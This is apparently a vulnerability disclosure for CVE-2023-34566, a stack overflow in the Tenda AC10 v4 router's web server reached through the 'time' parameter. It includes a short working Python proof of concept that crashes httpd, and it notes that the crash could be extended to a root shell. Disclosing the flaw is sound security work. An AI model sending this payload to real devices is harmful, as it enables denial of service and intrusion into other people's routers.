CVE-2023-34566: Tenda AC10 v4 was discovered stack overflow via parameter time at url /goform/saveParentControlInfo - HackMD

# Tenda AC10 v4 was discovered stack overflow via parameter time at url /goform/saveParentControlInfo ###### tags: `Tenda` `AC10 v4` vendor:Tenda product:AC10 v4 version:US_AC10V4.0si_V16.03.10.13_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter time at url /goform/saveParentControlInfo. ## Vulnerability Details In function saveParentControlInfo line 23, program proceed into function compare_parentcontrol_time.  In function compare_parentcontrol_time, v3 & v4 are local varialbes.  The content obtained by parameter ‘time’ is passed into s without length check. Then in line 27 the strings in s are formatted into v4 and v3, which leads to a stack overflow vulnerbility. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version 2. Run poc script.  ``` import requests exp = b’a’*100 url = “http://192.168.0.1/goform/saveParentControlInfo?time=%s” % exp payload={} headers = {} response = requests.request("GET", url, headers=headers, data=payload) print(response.text) ``` Run poc.py and you will see process httpd crash, segmentation fault.  And you can write your own exp to get the root shell.